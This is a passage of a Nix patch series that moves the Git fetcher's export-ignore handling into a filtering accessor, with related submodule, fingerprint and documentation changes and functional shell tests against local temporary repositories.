std::map> mounts; - for (auto & [submodule, submoduleRev] : repo->getSubmodules(rev)) { + for (auto & [submodule, submoduleRev] : repo->getSubmodules(rev, exportIgnore)) { auto resolved = repo->resolveSubmoduleUrl(submodule.url, repoInfo.url); debug("Git submodule %s: %s %s %s -> %s", submodule.path, submodule.url, submodule.branch, submoduleRev.gitRev(), resolved); diff --git a/tests/functional/fetchGit.sh b/tests/functional/fetchGit.sh index f0438f548..46532c025 100644 --- a/tests/functional/fetchGit.sh +++ b/tests/functional/fetchGit.sh @@ -231,12 +231,15 @@ unset _NIX_FORCE_HTTP # Ensure .gitattributes is respected touch $repo/not-exported-file +touch $repo/exported-wonky echo "/not-exported-file export-ignore" >> $repo/.gitattributes -git -C $repo add not-exported-file .gitattributes +echo "/exported-wonky export-ignore=wonk" >> $repo/.gitattributes +git -C $repo add not-exported-file exported-wonky .gitattributes git -C $repo commit -m 'Bla6' rev5=$(git -C $repo rev-parse HEAD) path12=$(nix eval --impure --raw --expr "(builtins.fetchGit { url = file://$repo; rev = \"$rev5\"; }).outPath") [[ ! -e $path12/not-exported-file ]] +[[ -e $path12/exported-wonky ]] # should fail if there is no repo rm -rf $repo/.git From 1c6bb609af3277ff3f747f49d04be80463d1f153 Mon Sep 17 00:00:00 2001 From: Robert Hensing Date: Tue, 28 Nov 2023 00:41:01 +0100 Subject: [PATCH 228/654] fetchTree: allow larger output attrsets Intentionally dumb change ahead of architectural improvements. --- src/libexpr/primops/fetchTree.cc | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/src/libexpr/primops/fetchTree.cc b/src/libexpr/primops/fetchTree.cc index e00c4f190..d04908b77 100644 --- a/src/libexpr/primops/fetchTree.cc +++ b/src/libexpr/primops/fetchTree.cc @@ -25,7 +25,7 @@ void emitTreeAttrs( { assert(input.isLocked()); - auto attrs = state.buildBindings(10); + auto attrs = state.buildBindings(100); state.mkStorePathString(storePath, attrs.alloc(state.sOutPath)); From f6b1d155804a946ff2965b5fd1a57159770e8b58 Mon Sep 17 00:00:00 2001 From: Robert Hensing Date: Mon, 11 Dec 2023 19:27:13 +0100 Subject: [PATCH 229/654] MakeNotAllowedError: Touch up doc --- src/libfetchers/filtering-input-accessor.hh | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/src/libfetchers/filtering-input-accessor.hh b/src/libfetchers/filtering-input-accessor.hh index a352a33a6..2e2495c78 100644 --- a/src/libfetchers/filtering-input-accessor.hh +++ b/src/libfetchers/filtering-input-accessor.hh @@ -6,7 +6,7 @@ namespace nix { /** - * A function that should throw an exception of type + * A function that returns an exception of type * `RestrictedPathError` explaining that access to `path` is * forbidden. */ From cd5e752fa72bf15ba8fe6fcdae92c77ac6dc2375 Mon Sep 17 00:00:00 2001 From: Robert Hensing Date: Mon, 11 Dec 2023 19:30:10 +0100 Subject: [PATCH 230/654] GitRepoImpl::getSubmodules: Access getSubmoduleRev without cast This will be needed because the accessor will be wrapped, and therefore not be an instance of GitInputAccessor anymore. --- src/libfetchers/git-utils.cc | 17 ++++++++++++++++- 1 file changed, 16 insertions(+), 1 deletion(-) diff --git a/src/libfetchers/git-utils.cc b/src/libfetchers/git-utils.cc index 4dc749504..d8a4f1778 100644 --- a/src/libfetchers/git-utils.cc +++ b/src/libfetchers/git-utils.cc @@ -52,6 +52,8 @@ bool operator == (const git_oid & oid1, const git_oid & oid2) namespace nix { +struct GitInputAccessor; + // Some wrapper types that ensure that the git_*_free functions get called. template struct Deleter @@ -342,6 +344,11 @@ struct GitRepoImpl : GitRepo, std::enable_shared_from_this return true; } + /** + * A 'GitInputAccessor' with no regard for export-ignore or any other transformations. + */ + ref getRawAccessor(const Hash & rev); + ref getAccessor(const Hash & rev, bool exportIgnore) override; static int sidebandProgressCallback(const char * str, int len, void * payload) @@ -685,6 +692,12 @@ struct GitInputAccessor : InputAccessor } }; +ref GitRepoImpl::getRawAccessor(const Hash & rev) +{ + auto self = ref(shared_from_this()); + return make_ref(self, rev); +} + ref GitRepoImpl::getAccessor(const Hash & rev, bool exportIgnore) { return make_ref(ref(shared_from_this()), rev, exportIgnore); @@ -706,8 +719,10 @@ std::vector> GitRepoImpl::getSubmodules std::vector> result; + auto rawAccessor = getRawAccessor(rev); + for (auto & submodule : parseSubmodules(CanonPath(pathTemp))) { - auto rev = accessor.dynamic_pointer_cast()->getSubmoduleRev(submodule.path); + auto rev = rawAccessor->getSubmoduleRev(submodule.path); result.push_back({std::move(submodule), rev}); } From 467c62a96eaabe2f71939a07d923a759f82a466f Mon Sep 17 00:00:00 2001 From: Robert Hensing Date: Mon, 11 Dec 2023 19:32:18 +0100 Subject: [PATCH 231/654] GitRepoImpl: Move exportIgnore into a filtering accessor --- src/libfetchers/git-utils.cc | 96 ++++++++++++++++++++---------------- 1 file changed, 54 insertions(+), 42 deletions(-) diff --git a/src/libfetchers/git-utils.cc b/src/libfetchers/git-utils.cc index d8a4f1778..f8b2afeef 100644 --- a/src/libfetchers/git-utils.cc +++ b/src/libfetchers/git-utils.cc @@ -1,5 +1,6 @@ #include "git-utils.hh" #include "input-accessor.hh" +#include "filtering-input-accessor.hh" #include "cache.hh" #include "finally.hh" #include "processes.hh" @@ -465,16 +466,17 @@ ref GitRepo::openRepo(const CanonPath & path, bool create, bool bare) return make_ref(path, create, bare); } +/** + * Raw git tree input accessor. + */ struct GitInputAccessor : InputAccessor { ref repo; Tree root; - bool exportIgnore; - GitInputAccessor(ref repo_, const Hash & rev, bool exportIgnore) + GitInputAccessor(ref repo_, const Hash & rev) : repo(repo_) , root(peelObject(*repo, lookupObject(*repo, hashToOID(rev)).get(), GIT_OBJECT_TREE)) - , exportIgnore(exportIgnore) { } @@ -503,7 +505,7 @@ struct GitInputAccessor : InputAccessor return Stat { .type = tDirectory }; auto entry = lookup(path); - if (!entry || isExportIgnored(path)) + if (!entry) return std::nullopt; auto mode = git_tree_entry_filemode(entry); @@ -538,12 +540,6 @@ struct GitInputAccessor : InputAccessor for (size_t n = 0; n < count; ++n) { auto entry = git_tree_entry_byindex(tree.get(), n); - if (exportIgnore) { - if (isExportIgnored(path + git_tree_entry_name(entry))) { - continue; - } - } - // FIXME: add to cache res.emplace(std::string(git_tree_entry_name(entry)), DirEntry{}); } @@ -573,33 +569,6 @@ struct GitInputAccessor : InputAccessor std::unordered_map lookupCache; - bool isExportIgnored(const CanonPath & path) { - if (!exportIgnore) - return false; - - const char *exportIgnoreEntry = nullptr; - - // GIT_ATTR_CHECK_INDEX_ONLY: - // > It will use index only for creating archives or for a bare repo - // > (if an index has been specified for the bare repo). - // -- https://github.com/libgit2/libgit2/blob/HEAD/include/git2/attr.h#L113C62-L115C48 - if (git_attr_get(&exportIgnoreEntry, - *repo, - GIT_ATTR_CHECK_INDEX_ONLY, - std::string(path.rel()).c_str(), - "export-ignore")) { - if (git_error_last()->klass == GIT_ENOTFOUND) - return false; - else - throw Error("looking up '%s': %s", showPath(path), git_error_last()->message); - } - else { - // Official git will silently reject export-ignore lines that have - // values. We do the same. - return GIT_ATTR_IS_TRUE(exportIgnoreEntry); - } - } - /* Recursively look up 'path' relative to the root. */ git_tree_entry * lookup(const CanonPath & path) { @@ -613,10 +582,6 @@ struct GitInputAccessor : InputAccessor throw Error("looking up '%s': %s", showPath(path), git_error_last()->message); } - if (entry && isExportIgnored(path)) { - entry.reset(); - } - i = lookupCache.emplace(path, std::move(entry)).first; } @@ -692,6 +657,46 @@ struct GitInputAccessor : InputAccessor } }; +struct GitExportIgnoreInputAccessor : FilteringInputAccessor { + ref repo; + + GitExportIgnoreInputAccessor(ref repo, ref next) + : FilteringInputAccessor(next, [&](const CanonPath & path) { + return RestrictedPathError(fmt("'%s' does not exist because it was fetched with exportIgnore enabled", path)); + }) + , repo(repo) + { } + + bool isExportIgnored(const CanonPath & path) { + const char *exportIgnoreEntry = nullptr; + + // GIT_ATTR_CHECK_INDEX_ONLY: + // > It will use index only for creating archives or for a bare repo + // > (if an index has been specified for the bare repo). + // -- https://github.com/libgit2/libgit2/blob/HEAD/include/git2/attr.h#L113C62-L115C48 + if (git_attr_get(&exportIgnoreEntry, + *repo, + GIT_ATTR_CHECK_INDEX_ONLY, + std::string(path.rel()).c_str(), + "export-ignore")) { + if (git_error_last()->klass == GIT_ENOTFOUND) + return false; + else + throw Error("looking up '%s': %s", showPath(path), git_error_last()->message); + } + else { + // Official git will silently reject export-ignore lines that have + // values. We do the same. + return GIT_ATTR_IS_TRUE(exportIgnoreEntry); + } + } + + bool isAllowed(const CanonPath & path) override { + return !isExportIgnored(path); + } + +}; + ref GitRepoImpl::getRawAccessor(const Hash & rev) { auto self = ref(shared_from_this()); @@ -700,7 +705,14 @@ ref GitRepoImpl::getRawAccessor(const Hash & rev) ref GitRepoImpl::getAccessor(const Hash & rev, bool exportIgnore) { - return make_ref(ref(shared_from_this()), rev, exportIgnore); + auto self = ref(shared_from_this()); + ref rawGitAccessor = getRawAccessor(rev); + if (exportIgnore) { + return make_ref(self, rawGitAccessor); + } + else { + return rawGitAccessor; + } } std::vector> GitRepoImpl::getSubmodules(const Hash & rev, bool exportIgnore) From 8024b954d702e0693b532650230037e398453693 Mon Sep 17 00:00:00 2001 From: Robert Hensing Date: Mon, 11 Dec 2023 19:42:46 +0100 Subject: [PATCH 232/654] fetchTree: Recommend against exportIgnore --- src/libexpr/primops/fetchTree.cc | 2 ++ 1 file changed, 2 insertions(+) diff --git a/src/libexpr/primops/fetchTree.cc b/src/libexpr/primops/fetchTree.cc index d04908b77..2e4b72c9f 100644 --- a/src/libexpr/primops/fetchTree.cc +++ b/src/libexpr/primops/fetchTree.cc @@ -607,6 +607,8 @@ static RegisterPrimOp primop_fetchGit({ A Boolean parameter that specifies whether `export-ignore` from `.gitattributes` should be applied. This approximates part of the `git archive` behavior. + Enabling this option is not recommended because it is unknown whether the Git developers commit to the reproducibility of `export-ignore` in newer Git versions. + - `shallow` (default: `false`) A Boolean parameter that specifies whether fetching from a shallow remote repository is allowed. From 7774eff10e0ec1f540a6dc22d8fd78de40714bdf Mon Sep 17 00:00:00 2001 From: Robert Hensing Date: Mon, 11 Dec 2023 22:28:53 +0100 Subject: [PATCH 233/654] libfetchers/git: Move workdir accessor into GitRepo::getAccessor --- src/libfetchers/git-utils.cc | 19 +++++++++++++++++++ src/libfetchers/git-utils.hh | 3 +++ src/libfetchers/git.cc | 8 ++++---- 3 files changed, 26 insertions(+), 4 deletions(-) diff --git a/src/libfetchers/git-utils.cc b/src/libfetchers/git-utils.cc index f8b2afeef..d218276b4 100644 --- a/src/libfetchers/git-utils.cc +++ b/src/libfetchers/git-utils.cc @@ -1,4 +1,5 @@ #include "git-utils.hh" +#include "fs-input-accessor.hh" #include "input-accessor.hh" #include "filtering-input-accessor.hh" #include "cache.hh" @@ -352,6 +353,8 @@ struct GitRepoImpl : GitRepo, std::enable_shared_from_this ref getAccessor(const Hash & rev, bool exportIgnore) override; + ref getAccessor(const WorkdirInfo & wd, bool exportIgnore, MakeNotAllowedError e) override; + static int sidebandProgressCallback(const char * str, int len, void * payload) { auto act = (Activity *) payload; @@ -715,6 +718,22 @@ ref GitRepoImpl::getAccessor(const Hash & rev, bool exportIgnore) } } +ref GitRepoImpl::getAccessor(const WorkdirInfo & wd, bool exportIgnore, MakeNotAllowedError makeNotAllowedError) +{ + auto self = ref(shared_from_this()); + ref fileAccessor = + AllowListInputAccessor::create( + makeFSInputAccessor(path), + std::set { wd.files }, + std::move(makeNotAllowedError)); + if (exportIgnore) { + return make_ref(self, fileAccessor); + } + else { + return fileAccessor; + } +} + std::vector> GitRepoImpl::getSubmodules(const Hash & rev, bool exportIgnore) { /* Read the .gitmodules files from this revision. */ diff --git a/src/libfetchers/git-utils.hh b/src/libfetchers/git-utils.hh index f1cb48065..768554780 100644 --- a/src/libfetchers/git-utils.hh +++ b/src/libfetchers/git-utils.hh @@ -1,5 +1,6 @@ #pragma once +#include "filtering-input-accessor.hh" #include "input-accessor.hh" namespace nix { @@ -73,6 +74,8 @@ struct GitRepo virtual ref getAccessor(const Hash & rev, bool exportIgnore) = 0; + virtual ref getAccessor(const WorkdirInfo & wd, bool exportIgnore, MakeNotAllowedError makeNotAllowedError) = 0; + virtual void fetch( const std::string & url, const std::string & refspec, diff --git a/src/libfetchers/git.cc b/src/libfetchers/git.cc index fb8bf5bf4..d7818988f 100644 --- a/src/libfetchers/git.cc +++ b/src/libfetchers/git.cc @@ -9,7 +9,6 @@ #include "processes.hh" #include "git.hh" #include "fs-input-accessor.hh" -#include "filtering-input-accessor.hh" #include "mounted-input-accessor.hh" #include "git-utils.hh" #include "logging.hh" @@ -659,10 +658,11 @@ struct GitInputScheme : InputScheme for (auto & submodule : repoInfo.workdirInfo.submodules) repoInfo.workdirInfo.files.insert(submodule.path); + auto repo = GitRepo::openRepo(CanonPath(repoInfo.url), false, false); + ref accessor = - AllowListInputAccessor::create( - makeFSInputAccessor(CanonPath(repoInfo.url)), - std::move(repoInfo.workdirInfo.files), + repo->getAccessor(repoInfo.workdirInfo, + getExportIgnoreAttr(input), makeNotAllowedError(repoInfo.url)); /* If the repo has submodules, return a mounted input accessor From 1bbe8371849f33da4edba23289de7b7e3c5d6c83 Mon Sep 17 00:00:00 2001 From: Robert Hensing Date: Mon, 11 Dec 2023 22:35:11 +0100 Subject: [PATCH 234/654] fetchTree: Add isFetchGit exportIgnore --- src/libexpr/primops/fetchTree.cc | 1 + 1 file changed, 1 insertion(+) diff --git a/src/libexpr/primops/fetchTree.cc b/src/libexpr/primops/fetchTree.cc index 2e4b72c9f..c167444b0 100644 --- a/src/libexpr/primops/fetchTree.cc +++ b/src/libexpr/primops/fetchTree.cc @@ -161,6 +161,7 @@ static void fetchTree( fetchers::Attrs attrs; attrs.emplace("type", "git"); attrs.emplace("url", fixGitURL(url)); + attrs.emplace("exportIgnore", Explicit{true}); input = fetchers::Input::fromAttrs(std::move(attrs)); } else { if (!experimentalFeatureSettings.isEnabled(Xp::Flakes)) From 99bd12f0b18b1a2a94639134c49c478c9ab56b3b Mon Sep 17 00:00:00 2001 From: Robert Hensing Date: Mon, 11 Dec 2023 22:36:08 +0100 Subject: [PATCH 235/654] fetchGit/fetchTree: Improve exportIgnore, submodule interaction Also fingerprint and some preparatory improvements. Testing is still not up to scratch because lots of logic is duplicated between the workdir and commit cases. --- src/libexpr/primops/fetchTree.cc | 16 ++++++---- src/libfetchers/fetchers.hh | 7 +++++ src/libfetchers/git-utils.cc | 43 +++++++++++++++++++++----- src/libfetchers/git.cc | 9 ++++-- tests/functional/fetchGitSubmodules.sh | 42 +++++++++++++++++++++++++ 5 files changed, 101 insertions(+), 16 deletions(-) diff --git a/src/libexpr/primops/fetchTree.cc b/src/libexpr/primops/fetchTree.cc index c167444b0..7a4725334 100644 --- a/src/libexpr/primops/fetchTree.cc +++ b/src/libexpr/primops/fetchTree.cc @@ -116,11 +116,6 @@ static void fetchTree( attrs.emplace("type", type.value()); - if (params.isFetchGit) { - // Default value; user attrs are assigned later. - attrs.emplace("exportIgnore", Explicit{true}); - } - for (auto & attr : *args[0]->attrs) { if (attr.name == state.sType) continue; state.forceValue(*attr.value, attr.pos); @@ -144,6 +139,12 @@ static void fetchTree( state.symbols[attr.name], showType(*attr.value))); } + if (params.isFetchGit && !attrs.contains("exportIgnore")) { + // Default value; user attrs are assigned later. + // FIXME: exportIgnore := !submodules + attrs.emplace("exportIgnore", Explicit{true}); + } + if (!params.allowNameArgument) if (auto nameIter = attrs.find("name"); nameIter != attrs.end()) state.debugThrowLastTrace(EvalError({ @@ -161,7 +162,10 @@ static void fetchTree( fetchers::Attrs attrs; attrs.emplace("type", "git"); attrs.emplace("url", fixGitURL(url)); - attrs.emplace("exportIgnore", Explicit{true}); + if (!attrs.contains("exportIgnore")) { + // FIXME: exportIgnore := !submodules + attrs.emplace("exportIgnore", Explicit{true}); + } input = fetchers::Input::fromAttrs(std::move(attrs)); } else { if (!experimentalFeatureSettings.isEnabled(Xp::Flakes)) diff --git a/src/libfetchers/fetchers.hh b/src/libfetchers/fetchers.hh index 5f3254b6d..036647830 100644 --- a/src/libfetchers/fetchers.hh +++ b/src/libfetchers/fetchers.hh @@ -187,6 +187,13 @@ struct InputScheme virtual bool isDirect(const Input & input) const { return true; } + /** + * A sufficiently unique string that can be used as a cache key to identify the `input`. + * + * Only known-equivalent inputs should return the same fingerprint. + * + * This is not a stable identifier between Nix versions, but not guaranteed to change either. + */ virtual std::optional getFingerprint(ref store, const Input & input) const { return std::nullopt; } }; diff --git a/src/libfetchers/git-utils.cc b/src/libfetchers/git-utils.cc index d218276b4..cd65e0fda 100644 --- a/src/libfetchers/git-utils.cc +++ b/src/libfetchers/git-utils.cc @@ -662,14 +662,45 @@ struct GitInputAccessor : InputAccessor struct GitExportIgnoreInputAccessor : FilteringInputAccessor { ref repo; + std::optional rev; - GitExportIgnoreInputAccessor(ref repo, ref next) + GitExportIgnoreInputAccessor(ref repo, ref next, std::optional rev) : FilteringInputAccessor(next, [&](const CanonPath & path) { return RestrictedPathError(fmt("'%s' does not exist because it was fetched with exportIgnore enabled", path)); }) , repo(repo) + , rev(rev) { } + bool gitAttrGet(const CanonPath & path, const char * attrName, const char * & valueOut) + { + std::string pathStr {path.rel()}; + const char * pathCStr = pathStr.c_str(); + + if (rev) { + git_attr_options opts = GIT_ATTR_OPTIONS_INIT; + opts.attr_commit_id = hashToOID(*rev); + // TODO: test that gitattributes from global and system are not used + // (ie more or less: home and etc - both of them!) + opts.flags = GIT_ATTR_CHECK_INCLUDE_COMMIT | GIT_ATTR_CHECK_NO_SYSTEM; + return git_attr_get_ext( + &valueOut, + *repo, + &opts, + pathCStr, + attrName + ); + } + else { + return git_attr_get( + &valueOut, + *repo, + GIT_ATTR_CHECK_INDEX_ONLY | GIT_ATTR_CHECK_NO_SYSTEM, + pathCStr, + attrName); + } + } + bool isExportIgnored(const CanonPath & path) { const char *exportIgnoreEntry = nullptr; @@ -677,11 +708,7 @@ struct GitExportIgnoreInputAccessor : FilteringInputAccessor { // > It will use index only for creating archives or for a bare repo // > (if an index has been specified for the bare repo). // -- https://github.com/libgit2/libgit2/blob/HEAD/include/git2/attr.h#L113C62-L115C48 - if (git_attr_get(&exportIgnoreEntry, - *repo, - GIT_ATTR_CHECK_INDEX_ONLY, - std::string(path.rel()).c_str(), - "export-ignore")) { + if (gitAttrGet(path, "export-ignore", exportIgnoreEntry)) { if (git_error_last()->klass == GIT_ENOTFOUND) return false; else @@ -711,7 +738,7 @@ ref GitRepoImpl::getAccessor(const Hash & rev, bool exportIgnore) auto self = ref(shared_from_this()); ref rawGitAccessor = getRawAccessor(rev); if (exportIgnore) { - return make_ref(self, rawGitAccessor); + return make_ref(self, rawGitAccessor, rev); } else { return rawGitAccessor; @@ -727,7 +754,7 @@ ref GitRepoImpl::getAccessor(const WorkdirInfo & wd, bool exportI std::set { wd.files }, std::move(makeNotAllowedError)); if (exportIgnore) { - return make_ref(self, fileAccessor); + return make_ref(self, fileAccessor, std::nullopt); } else { return fileAccessor; diff --git a/src/libfetchers/git.cc b/src/libfetchers/git.cc index d7818988f..10c0aef97 100644 --- a/src/libfetchers/git.cc +++ b/src/libfetchers/git.cc @@ -628,6 +628,7 @@ struct GitInputScheme : InputScheme if (submodule.branch != "") attrs.insert_or_assign("ref", submodule.branch); attrs.insert_or_assign("rev", submoduleRev.gitRev()); + attrs.insert_or_assign("exportIgnore", Explicit{ exportIgnore }); auto submoduleInput = fetchers::Input::fromAttrs(std::move(attrs)); auto [submoduleAccessor, submoduleInput2] = submoduleInput.getAccessor(store); @@ -660,9 +661,11 @@ struct GitInputScheme : InputScheme auto repo = GitRepo::openRepo(CanonPath(repoInfo.url), false, false); + auto exportIgnore = getExportIgnoreAttr(input); + ref accessor = repo->getAccessor(repoInfo.workdirInfo, - getExportIgnoreAttr(input), + exportIgnore, makeNotAllowedError(repoInfo.url)); /* If the repo has submodules, return a mounted input accessor @@ -676,6 +679,8 @@ struct GitInputScheme : InputScheme fetchers::Attrs attrs; attrs.insert_or_assign("type", "git"); attrs.insert_or_assign("url", submodulePath.abs()); + attrs.insert_or_assign("exportIgnore", Explicit{ exportIgnore }); + auto submoduleInput = fetchers::Input::fromAttrs(std::move(attrs)); auto [submoduleAccessor, submoduleInput2] = submoduleInput.getAccessor(store); @@ -747,7 +752,7 @@ struct GitInputScheme : InputScheme std::optional getFingerprint(ref store, const Input & input) const override { if (auto rev = input.getRev()) - return rev->gitRev() + (getSubmodulesAttr(input) ? ";s" : ""); + return rev->gitRev() + (getSubmodulesAttr(input) ? ";s" : "") + (getExportIgnoreAttr(input) ? ";e" : ""); else return std::nullopt; } diff --git a/tests/functional/fetchGitSubmodules.sh b/tests/functional/fetchGitSubmodules.sh index 369cdc5db..1b425820e 100644 --- a/tests/functional/fetchGitSubmodules.sh +++ b/tests/functional/fetchGitSubmodules.sh @@ -118,3 +118,45 @@ cloneRepo=$TEST_ROOT/a/b/gitSubmodulesClone # NB /a/b to make the relative path git clone $rootRepo $cloneRepo pathIndirect=$(nix eval --raw --expr "(builtins.fetchGit { url = file://$cloneRepo; rev = \"$rev2\"; submodules = true; }).outPath") [[ $pathIndirect = $pathWithRelative ]] + +# Test submodule export-ignore interaction +git -C $rootRepo/sub config user.email "foobar@example.com" +git -C $rootRepo/sub config user.name "Foobar" + +echo "/exclude-from-root export-ignore" >> $rootRepo/.gitattributes +echo nope > $rootRepo/exclude-from-root +git -C $rootRepo add .gitattributes exclude-from-root +git -C $rootRepo commit -m "Add export-ignore" + +echo "/exclude-from-sub export-ignore" >> $rootRepo/sub/.gitattributes +echo nope > $rootRepo/sub/exclude-from-sub +git -C $rootRepo/sub add .gitattributes exclude-from-sub +git -C $rootRepo/sub commit -m "Add export-ignore (sub)" + +git -C $rootRepo add sub +git -C $rootRepo commit -m "Update submodule" + +git -C $rootRepo status + +# exportIgnore can be used with submodules +pathWithExportIgnore=$(nix eval --impure --raw --expr "(builtins.fetchGit { url = file://$rootRepo; submodules = true; exportIgnore = true; }).outPath") +# find $pathWithExportIgnore +# git -C $rootRepo archive --format=tar HEAD | tar -t +# cp -a $rootRepo /tmp/rootRepo + +[[ -e $pathWithExportIgnore/sub/content ]] +[[ ! -e $pathWithExportIgnore/exclude-from-root ]] +[[ ! -e $pathWithExportIgnore/sub/exclude-from-sub ]] + +# exportIgnore can be explicitly disabled with submodules +pathWithoutExportIgnore=$(nix eval --impure --raw --expr "(builtins.fetchGit { url = file://$rootRepo; submodules = true; exportIgnore = false; }).outPath") +# find $pathWithoutExportIgnore + +[[ -e $pathWithoutExportIgnore/exclude-from-root ]] +[[ -e $pathWithoutExportIgnore/sub/exclude-from-sub ]] + +# exportIgnore defaults to false when submodules = true +pathWithSubmodules=$(nix eval --impure --raw --expr "(builtins.fetchGit { url = file://$rootRepo; submodules = true; }).outPath") + +[[ -e $pathWithoutExportIgnore/exclude-from-root ]] +[[ -e $pathWithoutExportIgnore/sub/exclude-from-sub ]] From 71d08af15bb2973dc2a1cb7fee18f94d779dfed7 Mon Sep 17 00:00:00 2001 From: Robert Hensing Date: Fri, 5 Jan 2024 19:01:12 +0100 Subject: [PATCH 236/654] rl-next: Add *general* note about git fetcher reimpl --- doc/manual/rl-next/git-fetcher.md | 18 ++++++++++++++++++ 1 file changed, 18 insertions(+) create mode 100644 doc/manual/rl-next/git-fetcher.md diff --git a/doc/manual/rl-next/git-fetcher.md b/doc/manual/rl-next/git-fetcher.md new file mode 100644 index 000000000..54c0d216d --- /dev/null +++ b/doc/manual/rl-next/git-fetcher.md @@ -0,0 +1,18 @@ +--- +synopsis: "Nix now uses `libgit2` for Git fetching" +prs: + - 9240 + - 9241 + - 9258 + - 9480 +issues: + - 5313 +--- + +Nix has built-in support for fetching sources from Git, during evaluation and locking; outside the sandbox. +The existing implementation based on the Git CLI had issues regarding reproducibility and performance. + +Most of the original `fetchGit` behavior has been implemented using the `libgit2` library, which gives the fetcher fine-grained control. + +Known issues: +- The `export-subst` behavior has not been reimplemented. [Partial](https://github.com/NixOS/nix/pull/9391#issuecomment-1872503447) support for this Git feature is feasible, but it did not make the release window. From 692e9197bc91f874ec30f839b1ae6d1beefa1eeb Mon Sep 17 00:00:00 2001 From: Robert Hensing Date: Fri, 5 Jan 2024 19:49:39 +0100 Subject: [PATCH 237/654] fetchTree: Disallow combination of submodules and exportIgnore for now --- src/libexpr/primops/fetchTree.cc | 8 +++----- src/libfetchers/git.cc | 11 +++++++++++ tests/functional/fetchGitSubmodules.sh | 26 ++++++++++++++++++-------- 3 files changed, 32 insertions(+), 13 deletions(-) diff --git a/src/libexpr/primops/fetchTree.cc b/src/libexpr/primops/fetchTree.cc index 7a4725334..4d22ca01e 100644 --- a/src/libexpr/primops/fetchTree.cc +++ b/src/libexpr/primops/fetchTree.cc @@ -1,3 +1,4 @@ +#include "libfetchers/attrs.hh" #include "primops.hh" #include "eval-inline.hh" #include "eval-settings.hh" @@ -139,9 +140,7 @@ static void fetchTree( state.symbols[attr.name], showType(*attr.value))); } - if (params.isFetchGit && !attrs.contains("exportIgnore")) { - // Default value; user attrs are assigned later. - // FIXME: exportIgnore := !submodules + if (params.isFetchGit && !attrs.contains("exportIgnore") && (!attrs.contains("submodules") || !*fetchers::maybeGetBoolAttr(attrs, "submodules"))) { attrs.emplace("exportIgnore", Explicit{true}); } @@ -162,8 +161,7 @@ static void fetchTree( fetchers::Attrs attrs; attrs.emplace("type", "git"); attrs.emplace("url", fixGitURL(url)); - if (!attrs.contains("exportIgnore")) { - // FIXME: exportIgnore := !submodules + if (!attrs.contains("exportIgnore") && (!attrs.contains("submodules") || !*fetchers::maybeGetBoolAttr(attrs, "submodules"))) { attrs.emplace("exportIgnore", Explicit{true}); } input = fetchers::Input::fromAttrs(std::move(attrs)); diff --git a/src/libfetchers/git.cc b/src/libfetchers/git.cc index 10c0aef97..6ecb7a4ea 100644 --- a/src/libfetchers/git.cc +++ b/src/libfetchers/git.cc @@ -1,3 +1,4 @@ +#include "error.hh" #include "fetchers.hh" #include "users.hh" #include "cache.hh" @@ -739,6 +740,16 @@ struct GitInputScheme : InputScheme auto repoInfo = getRepoInfo(input); + if (getExportIgnoreAttr(input) + && getSubmodulesAttr(input)) { + /* In this situation, we don't have a git CLI behavior that we can copy. + `git archive` does not support submodules, so it is unclear whether + rules from the parent should affect the submodule or not. + When git may eventually implement this, we need Nix to match its + behavior. */ + throw UnimplementedError("exportIgnore and submodules are not supported together yet"); + } + auto [accessor, final] = input.getRef() || input.getRev() || !repoInfo.isLocal ? getAccessorFromCommit(store, repoInfo, std::move(input)) diff --git a/tests/functional/fetchGitSubmodules.sh b/tests/functional/fetchGitSubmodules.sh index 1b425820e..cd180815d 100644 --- a/tests/functional/fetchGitSubmodules.sh +++ b/tests/functional/fetchGitSubmodules.sh @@ -124,12 +124,16 @@ git -C $rootRepo/sub config user.email "foobar@example.com" git -C $rootRepo/sub config user.name "Foobar" echo "/exclude-from-root export-ignore" >> $rootRepo/.gitattributes +# TBD possible semantics for submodules + exportIgnore +# echo "/sub/exclude-deep export-ignore" >> $rootRepo/.gitattributes echo nope > $rootRepo/exclude-from-root git -C $rootRepo add .gitattributes exclude-from-root git -C $rootRepo commit -m "Add export-ignore" echo "/exclude-from-sub export-ignore" >> $rootRepo/sub/.gitattributes echo nope > $rootRepo/sub/exclude-from-sub +# TBD possible semantics for submodules + exportIgnore +# echo aye > $rootRepo/sub/exclude-from-root git -C $rootRepo/sub add .gitattributes exclude-from-sub git -C $rootRepo/sub commit -m "Add export-ignore (sub)" @@ -138,15 +142,21 @@ git -C $rootRepo commit -m "Update submodule" git -C $rootRepo status -# exportIgnore can be used with submodules -pathWithExportIgnore=$(nix eval --impure --raw --expr "(builtins.fetchGit { url = file://$rootRepo; submodules = true; exportIgnore = true; }).outPath") -# find $pathWithExportIgnore -# git -C $rootRepo archive --format=tar HEAD | tar -t -# cp -a $rootRepo /tmp/rootRepo +# # TBD: not supported yet, because semantics are undecided and current implementation leaks rules from the root to submodules +# # exportIgnore can be used with submodules +# pathWithExportIgnore=$(nix eval --impure --raw --expr "(builtins.fetchGit { url = file://$rootRepo; submodules = true; exportIgnore = true; }).outPath") +# # find $pathWithExportIgnore +# # git -C $rootRepo archive --format=tar HEAD | tar -t +# # cp -a $rootRepo /tmp/rootRepo + +# [[ -e $pathWithExportIgnore/sub/content ]] +# [[ ! -e $pathWithExportIgnore/exclude-from-root ]] +# [[ ! -e $pathWithExportIgnore/sub/exclude-from-sub ]] +# TBD possible semantics for submodules + exportIgnore +# # root .gitattribute has no power across submodule boundary +# [[ -e $pathWithExportIgnore/sub/exclude-from-root ]] +# [[ -e $pathWithExportIgnore/sub/exclude-deep ]] -[[ -e $pathWithExportIgnore/sub/content ]] -[[ ! -e $pathWithExportIgnore/exclude-from-root ]] -[[ ! -e $pathWithExportIgnore/sub/exclude-from-sub ]] # exportIgnore can be explicitly disabled with submodules pathWithoutExportIgnore=$(nix eval --impure --raw --expr "(builtins.fetchGit { url = file://$rootRepo; submodules = true; exportIgnore = false; }).outPath") From 469cf263c7d1b7991a9122b76b827f3d65a02301 Mon Sep 17 00:00:00 2001 From: Robert Hensing Date: Fri, 12 Jan 2024 14:02:58 +0100 Subject: [PATCH 238/654] Format --- src/libfetchers/git-utils.cc | 6 ++++-- 1 file changed, 4 insertions(+), 2 deletions(-) diff --git a/src/libfetchers/git-utils.cc b/src/libfetchers/git-utils.cc index cd65e0fda..b416c3b52 100644 --- a/src/libfetchers/git-utils.cc +++ b/src/libfetchers/git-utils.cc @@ -701,7 +701,8 @@ struct GitExportIgnoreInputAccessor : FilteringInputAccessor { } } - bool isExportIgnored(const CanonPath & path) { + bool 